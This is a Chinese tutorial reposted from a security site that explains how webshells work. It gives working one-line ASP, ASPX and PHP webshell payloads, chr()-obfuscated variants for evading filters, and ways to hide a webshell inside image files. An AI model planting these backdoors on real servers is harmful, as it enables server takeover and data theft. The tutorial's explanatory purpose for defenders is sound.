脚本木马的制作原理
webshell就是一种网页后门(web后门)
webshell制作原理
webshell使用技巧
webshell"黑吃黑"
一. webshell制作原理
一句话木马(2010年出来)--> 上传大马进行提权
小马 --> 上传大马进行提权
大马
打包马
脱裤马
执行命令马
GetShell就是拿webshell的动作
1. 一句话木马
一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用
asp :
<% execute request("value") %>
<%eval request ("pass")%>
--------------------------------------
sms2056.com/x.asp?value="cmd"
aspx :
<%@ Page Language="Jscript"%>
<%eval(Request.I tem["pass"]," uns afe");%>
PHP :
<?php @eval($_POST['attack']) ?>
2. 工作原理
黑客在注册信息的电子邮箱或个人主页等中插入类似如下代码:
<%eval request ("pass")%>
其中pass
是值,所以你可以更改自己的值,前面的request
就是获取这个值
上述代码现在比较多见,而且字符数少,对表单字数有限制的地方特别的实用
当知道了数据库的URL,就可以利用本地一张网页进行连接得到WebShell(不知道数据库也可以,只要知道一句话木马
的文件被插入到那一个ASP文件里面就可以了)
一句话木马是基于B/S
结构的
3. 一句话木马变形
<?php $_GET['a']($_POST['b']) ?>
---------------------------------------
x.php?a=eval&b="cmd"
<%Eval (Request(chr(112)))%>
---------------------------------------
aspcms2.0以上会检查脚本中的双引号""",单引号"'"
<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("pass"))%>
<% a=%request("gold") %><%eval %a%>
4. 一般WAF绕过方式
函数绕过
编码绕过
可变变量绕过
动态获取参数绕过
5. 一句话图片马的制作
C32下做一句话
打开c32, 把图片放里面,写入一句话保存,退出
cmd下做一句话
copy /b 1.jpg+1.asp 2.jpg
win7下右键图片,在属性 -> 详细信息 -> 版权内插入一句话即可
6. 常见的一句话客户端
中国菜刀
中国砍刀
蚁剑
C刀
lanker一句话客户端
ZV新型PHP一句话木马客户端GUI版
一句话客户端增强版
7. 大马
大马体积比较大,一般50kb以上.功能也多,一般都包含提权命令,磁盘管理,数据库连接接口,执行命令甚至有些以具备自带提权功能和压缩,解压缩网站程序的功能.这种马隐蔽性不好,而大多代码如不加密的话很多杀毒厂商开始追杀此类程序 .
用途 :
提权
打包
脱裤
增删文件
8. 小马
作用主要用户上传大马
二. webshell使用技巧
内容编码
配合解析漏洞
配合文件包含
利用文件名溢出
三. webshell”黑吃黑”
http://xss.fbisb.com/xss.php?do=login
1. 找shell后门
查找后门
查找webshell后门
找到后门地址
反搞wehshell箱子
2. 找一句话客户端后门
查找客户端后门
找到后门地址
反搞wehshell箱子
免责声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。禁止任何人转载到其他站点,禁止用于任何非法用途。如有任何人凭此做何非法事情,均于笔者无关,特此声明。
来源:freebuf.com 2020-09-15 21:02:00 by: minggege
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
请登录后发表评论
注册